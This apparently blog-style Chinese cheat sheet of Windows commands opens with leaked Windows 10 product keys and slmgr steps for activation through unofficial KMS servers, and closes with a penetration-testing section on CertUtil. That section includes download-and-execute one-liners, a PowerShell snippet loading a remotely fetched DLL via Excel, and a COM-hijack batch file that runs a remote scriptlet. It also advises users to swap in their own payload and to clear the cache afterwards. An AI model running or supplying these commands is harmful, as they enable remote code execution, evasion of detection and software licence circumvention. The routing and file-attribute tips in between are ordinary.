Windows 常用命令

用 slmgr 命令激活 win10

1.slmgr.vbs /upk     卸载产品密钥

2.slmgr /ipk TX9XD-98N7V-6WMQ6-BX7FG-H8Q99     安装产品密钥

3.slmgr /skms 132.232.70.97:1688     设置激活服务器

4.slmgr /ato     激活系统

win10 密钥须知：win10 激活码都有激活次数的限制，而且容易被官方封禁，所以不能保证 100%可用，win10 序列号不能用时，大家可以用激活工具来激活，市面上的激活工具都是 KMS 激活，KMS 是 180 天激活，到期后可反复激活进行续期，或下载安装。

win10 企业版 G kms 激活 400 年方法
Windows 10 Pro(win10 专业版激活密钥)

TPYNC-4J6KF-4B4GP-2HD89-7XMP6
2BXNW-6CGWX-9BXPV-YJ996-GMT6T
NRTT2-86GJM-T969G-8BCBH-BDWXG
XC88X-9N9QX-CDRVP-4XV22-RVV26
TNM78-FJKXR-P26YV-GP8MB-JK8XG
TR8NX-K7KPD-YTRW3-XTHKX-KQBP6

VK7JG-NPHTM-C97JM-9MPGT-3V66T
NPPR9-FWDCX-D2C8J-H872K-2YT43
W269N-WFGWX-YVC9B-4J6C9-T83GX
NYW94-47Q7H-7X9TT-W7TXD-JTYPM
NJ4MX-VQQ7Q-FP3DB-VDGHX-7XM87
MH37W-N47XK-V7XM9-C7227-GCQG9

windows10 Home（win10 家庭版激活码）：

TX9XD-98N7V-6WMQ6-BX7FG-H8Q99
3KHY7-WNT83-DGQKR-F7HPR-844BM
7HNRX-D7KGG-3K4RQ-4WPJ4-YTDFH
PVMJN-6DFY6-9CCP6-7BKTT-D3WVR
PPBK3-M92CH-MRR9X-34Y9P-7CH2F
(OA 3.0 版)
Win10 家庭版 37GNV-YCQVD-38XP9-T848R-FC2HD
Win10 家庭版 N 33C4Y-NPKCC-V98JP-42G8W-VH636
(非 OA 3.0 版)
Win10 家庭版 46J3N-RY6B3-BJFDY-VBFT9-V22HG
Win10 家庭版 N PGGM7-N77TC-KVR98-D82KJ-DGPHV

Windows 10 系统
企业版：XGVPP-NMH47-7TTHJ-W3FW7-8HV2C
教育版：YNMGQ-8RYV3-4PGQ3-C8XTP-7CFBY
专业版 N：2B87N-8KFHP-DKV6R-Y2C8J-PKCKT
企业版 N：WGGHN-J84D6-QYCPR-T7PJ7-X766F
教育版 N：84NGF-MHBT6-FXBX8-QWJK7-DRR8H
企业版 S：FWN7H-PF93Q-4GGP8-M8RF3-MDWWW
单语言版：BT79Q-G7N6G-PGBYW-4YWX6-6F4BT

Windows 10 Core Single Language:JPYNJ-XTFCR-372YJ-YJJ4Q-G83YB
Windows 10 Core 中文版 Language Edition:R3BYW-CBNWT-F3JTP-FM942-BTDXY
Windows 10 Core :KTNPV-KTRK4-3RRR8-39X6W-W44T3
Windows 10 Pro:8N67H-M3CY9-QT7C4-2TR7M-TXYCV
Windows 10 Enterprise:CKFK9-QNGF2-D34FM-99QX3-8XC4K
Windows 10 Core Single Language :JPYNH-XTFCR-372YJ-YJJ3Q-G83YB
Windows 10 Core Chinese Languange Edition:R3BYW-CBNWT-F3JTP-FM942-BTDXY

win10 企业版：
Windows 10 Enterprise : NPPR9-FWDCX-D2C8J-H872K-2YT43
Windows 10 Enterprise N: DPH2V-TTNVB-4X9Q3-TJR4H-KHJW4
Windows 10 Enterprise 2015 LTSB :WNMTR-4C88C-JK8YV-HQ7T2-76DF9
Windows 10 Enterprise 2015 LTSB N : 2F77B-TNFGY-69QQF-B8YKP-D69TJ

win10 预览版密钥：

Win10 企业版密钥：PBHCJ-Q2NYD-2PX34-T2TD6-233PK

Win10 专业版密钥：NKJFK-GPHP7-G8C3J-P6JXR-HQRJR

激活方法：
系统安装完毕后，首先以管理员身份打开 CMD 命令行窗口，按下 Win+X，选择命令提示符(管理员)。
说明：kms.xspace.in 是 kms 服务器地址，可能会失效，如果激活失败，可以自行搜索 kms 服务器地址，将 kms.xspace.in 替换成新的地址即可，比如换成 kms.03k.org，参考可用的 kms 激活服务器有哪些
win10 专业版用户请依次输入：
slmgr /ipk W269N-WFGWX-YVC9B-4J6C9-T83GX
slmgr /skms kms.03k.org
slmgr /ato

win10 企业版用户请依次输入：
slmgr /ipk NPPR9-FWDCX-D2C8J-H872K-2YT43
slmgr /skms kms.03k.org
slmgr /ato

win10 家庭版用户依次输入：
slmgr /ipk TX9XD-98N7V-6WMQ6-BX7FG-H8Q99
slmgr /skms kms.03k.org
slmgr /ato

路由相关

::route add 目标地址 mask 子网掩码 -p 下一跳
::例如：
route add 192.168.2.0 mask 255.255.255.0 -p 192.168.7.3
::删除的话只需要把 add 改为 delete 即可。

route print ::查看当前的路由表
tracert 192.168.7.1(目标地址) ::跟踪地址（从当前地址到达指定地址经过的路由）

1.attrib 修改文件属性

有些文件夹想隐藏起来，并不想加密。可用以下方法进行：将把普通文件夹改成受保护的操作系统文件
在命令提示符状态下（开始－> 运行－>cmd）：
输入命令：”attrib /?”
就有中文操作提示。如下：
ATTRIB [+R | -R] [+A | -A ] [+S | -S] [+H | -H] [[drive:] [path] filename] [/S [
/D]]

• 设置属性。

• 清除属性。
  R 只读文件属性。
  A 存档文件属性。
  S 系统文件属性。
  H 隐藏文件属性。
  [drive:][path][filename]
  指定要处理的文件属性。
  /S 处理当前文件夹及其子文件夹中的匹配文件。
  /D 也处理文件夹。

举例：
将 d 盘的 “电影” 文件夹 加系统属性和隐属性 (即受保护的操作系统文件)
C:>attrib +h +s d:\ 电影

相反取消则是
C:>attrib -h -s d:\ 电影

2.mklink 创建连接

命令区别：
/d 给目录创建符号链接，简称符号链接、软链接；
/h 创建硬链接，简称硬链接；
/j 给目录创建联接点，简称软链接。

当没有上面 3 个命令符时，创建是文件软链接！文件类型：.symlink
注意：
路径，建议使用绝对路径，必须使用英文双引号将路径括起来；
空格，命令之间必须有空格

例子：

mklink /J 连接到的路径 原路径
mklink /j test C:\Users\Serenity\Test

3.netstat 查找占用指定端口的进程 pid

#ano 为参数，表示  以数字形式显示所有连接和侦听的地址和端口号，并显示显示拥有的与每个连接关联的进程 ID
#a 显示所有连接和侦听端口。
#n 以数字形式显示地址和端口号。
#o 显示拥有的与每个连接关联的进程 ID。
#findstr 为字符串过滤(搜索结果中带有指定字符的记录，类似于linux中的grep)
netstat -ano |findstr 8569

CertUtil 渗透工具

CertUtil

1.帮助文档

动词:
-dump             – 转储配置信息或文件
-dumpPFX          – 转储 PFX 结构
-asn              – 分析 ASN.1 文件

-decodehex        – 解码十六进制编码的文件
-decode           – 解码 Base64 编码的文件
-encode           – 将文件编码为 Base64

-deny             – 拒绝挂起的申请
-resubmit         – 重新提交挂起的申请
-setattributes    – 为挂起申请设置属性
-setextension     – 为挂起申请设置扩展
-revoke           – 吊销证书
-isvalid          – 显示当前证书部署

-getconfig        – 获取默认配置字符串
-ping             – Ping Active Directory 证书服务申请接口
-pingadmin        – Ping Active Directory 证书服务管理接口
-CAInfo           – 显示 CA 信息
-ca.cert          – 检索 CA 的证书
-ca.chain         – 检索 CA 的证书链
-GetCRL           – 获取 CRL
-CRL              – 发布新的 CRL [或仅增量 CRL]
-shutdown         – 关闭 Active Directory 证书服务

-installCert      – 安装证书颁发机构证书
-renewCert        – 续订证书颁发机构证书

-schema           – 转储证书架构
-view             – 转储证书视图
-db               – 转储原始数据库
-deleterow        – 删除服务器数据库行

-backup           – 备份 Active Directory 证书服务
-backupDB         – 备份 Active Directory 证书服务数据库
-backupKey        – 备份 Active Directory 证书服务证书和私钥
-restore          – 还原 Active Directory 证书服务
-restoreDB        – 还原 Active Directory 证书服务数据库
-restoreKey       – 还原 Active Directory 证书服务证书和私钥
-importPFX        – 导入证书和私钥
-dynamicfilelist  – 显示动态文件列表
-databaselocations – 显示数据库位置
-hashfile         – 通过文件生成并显示加密哈希

-store            – 转储证书存储
-enumstore        – 枚举证书存储
-addstore         – 将证书添加到存储
-delstore         – 从存储删除证书
-verifystore      – 验证存储中的证书
-repairstore      – 修复密钥关联，或者更新证书属性或密钥安全描述符
-viewstore        – 转储证书存储
-viewdelstore     – 从存储删除证书
-UI               – 调用 CryptUI
-attest           – 验证密钥证明请求

-dsPublish        – 将证书或 CRL 发布到 Active Directory

-ADTemplate       – 显示 AD 模板
-Template         – 显示注册策略模板
-TemplateCAs      – 显示模板的 CA
-CATemplates      – 显示 CA 的模板
-SetCASites       – 管理 CA 的站点名称
-enrollmentServerURL – 显示、添加或删除与 CA 关联的注册服务器 URL
-ADCA             – 显示 AD CA
-CA               – 显示注册策略 CA
-Policy           – 显示注册策略
-PolicyCache      – 显示或删除注册策略缓存项目
-CredStore        – 显示、添加或删除凭据存储项目
-InstallDefaultTemplates – 安装默认的证书模板
-URLCache         – 显示或删除 URL 缓存项目
-pulse            – 以脉冲方式执行自动注册事件或 NGC 任务
-MachineInfo      – 显示 Active Directory 计算机对象信息
-DCInfo           – 显示域控制器信息
-EntInfo          – 显示企业信息
-TCAInfo          – 显示 CA 信息
-SCInfo           – 显示智能卡信息

-SCRoots          – 管理智能卡根证书

-verifykeys       – 验证公/私钥集
-verify           – 验证证书，CRL 或链
-verifyCTL        – 验证 AuthRoot 或不允许的证书 CTL
-syncWithWU       – 与 Windows 更新同步
-generateSSTFromWU – 通过 Windows 更新生成 SST
-generatePinRulesCTL – 生成捆绑规则 CTL
-downloadOcsp     – 下载 OCSP 响应并写入目录
-generateHpkpHeader – 使用指定文件或目录中的证书生成 HPKP 头
-flushCache       – 刷新选定进程(例如 lsass.exe)中的指定缓存
-addEccCurve      – 添加 ECC 曲线
-deleteEccCurve   – 删除 ECC 曲线
-displayEccCurve  – 显示 ECC 曲线
-sign             – 重新签名 CRL 或证书

-vroot            – 创建/删除 Web 虚拟根和文件共享
-vocsproot        – 创建/删除 OCSP Web Proxy 的 Web 虚拟根
-addEnrollmentServer – 添加注册服务器应用程序
-deleteEnrollmentServer – 删除注册服务器应用程序
-addPolicyServer  – 添加策略服务器应用程序
-deletePolicyServer – 删除策略服务器应用程序
-oid              – 显示 ObjectId 或设置显示名称
-error            – 显示错误代码消息文本
-getreg           – 显示注册表值
-setreg           – 设置注册表值
-delreg           – 删除注册表值

-ImportKMS        – 为密钥存档导入用户密钥和证书到服务器数据库
-ImportCert       – 将证书文件导入数据库
-GetKey           – 检索存档的私钥恢复 Blob，生成恢复脚本 或恢复存档的密钥
-RecoverKey       – 恢复存档的私钥
-MergePFX         – 合并 PFX 文件
-ConvertEPF       – 将 PFX 文件转换为 EPF 文件

-add-chain        – (-AddChain) 添加证书链
-add-pre-chain    – (-AddPrechain) 添加预植证书链
-get-sth          – (-GetSTH) 获取签名树头
-get-sth-consistency – (-GetSTHConsistency) 获取签名树头更改
-get-proof-by-hash – (-GetProofByHash) 获取哈希证明
-get-entries      – (-GetEntries) 获取项
-get-roots        – (-GetRoots) 获取根
-get-entry-and-proof – (-GetEntryAndProof) 获取项和证明
-VerifyCT         – 验证证书 SCT
-?                – 显示该用法消息

CertUtil -?              – 显示动词列表(命名列表)
CertUtil -dump -?        – 显示 “dump” 动词的帮助文本
CertUtil -v -?           – 显示所有动词的所有帮助文本

2.使用案例

certutil 简介

用于备份证书服务管理,支持 xp-win10

更多操作说明见https://technet.microsoft.com/zh-cn/library/cc755341(v=ws.10).aspx

渗透测试中的应用

1、downloader

(1) 保存在当前路径，文件名称和下载文件名称相同

certutil  -urlcache  -split  -f  https://github.com/backlion/demo/blob/master/weblogic.py

(2) 保存在当前路径，指定保存文件名称

certutil  -urlcache  -split  -f   https://github.com/backlion/demo/blob/master/weblogic.py  test.py

(3) 保存在缓存目录，名称随机
缓存目录位置：  %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content

certutil  -urlcache   -f   https://github.com/backlion/demo/blob/master/weblogic.py

2、清除下载文件副本方法

（1） 方法一，直接删除缓存目录对应文件
如下图:

（2）方法二，命令行:

certutil  -urlcache   -f   https://github.com/backlion/demo/blob/master/weblogic.py delete

（3） 补充：
查看缓存项目：

certutil.exe -urlcache *

如下图

3、实际测试

(1) powershell 中的利用
测试系统安装 Office 软件，下载执行 dll 对应的 powershell 代码如下：

$path="D:\test\msg1.dll"
 certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll  $path
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application"))
$excel.RegisterXLL($path)

测试如下图

(2) 下载劫持 com 的 sct 的批处理文件
test.bat(这里批处理是利用到 certutil 下载 sct 文件劫持 com 弹出计算器）：

@echo off
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit.1.00 /ve /t REG_SZ /d Bandit /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit.1.00\CLSID /ve /t REG_SZ /d {00000001-0000-0000-0000-0000FEEDACDC} /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit /ve /t REG_SZ /d Bandit /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit\CLSID /ve /t REG_SZ /d {00000001-0000-0000-0000-0000FEEDACDC} /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC} /ve /t REG_SZ /d Bandit /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32 /ve /t REG_SZ /d C:\WINDOWS\system32\scrobj.dll /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32 /v ThreadingModel  /t REG_SZ /d Apartment /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID /ve /t REG_SZ /d Bandit.1.00 /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL /ve /t REG_SZ /d https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID /ve /t REG_SZ /d Bandit /f 1>nul 2>&1
reg add HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}\TreatAs /ve /t REG_SZ /d {00000001-0000-0000-0000-0000FEEDACDC} /f 1>nul 2>&1
certutil 1>nul 2>&1
reg delete HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit.1.00 /f 1>nul 2>&1
reg delete HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit /f 1>nul 2>&1
reg delete HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC} /f 1>nul 2>&1
reg delete HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}\TreatAs /f 1>nul 2>&1
echo Done!

这里测试的 test.scr:

注意：在实战中需要替换该批处理文件中地址:
https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct为你自己需要的 sct（劫持 com）文件

运行批处理如下：

4、计算文件 hash

(1) SHA1

certutil  -hashfile msg1.dll

(2) SHA256：

certutil  -hashfile msg1.dll SHA256

(3) MD5：

certutil  -hashfile msg1.dll MD5

5、base64 编码转换
(1) base64 编码：

CertUtil -encode InFile OutFile

(2) base64 解码

CertUtil -decode InFile OutFile

注：
编码后的文件会添加两处标识信息：
文件头：
—–BEGIN CERTIFICATE—–
文件尾：
—–END CERTIFICATE—–
如下图

downloader 常用方法

常用的 cmd 下 downloader 方法，相比来说，利用 certUtil 简便快捷，但是使用后需要注意清除缓存，路径如下：
%USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content

downloader 常用方法如下：
· certUtil
· powershell
· csc
· vbs
· JScript
· hta
· bitsadmin
· wget
· debug
· ftp
· ftfp

小结

本文介绍了 certutil 在渗透测试中的应用，详细介绍利用 certutil 作 downloader 的实现方法和检测方法
更多学习请看https://3gstudent.github.io/本文的出处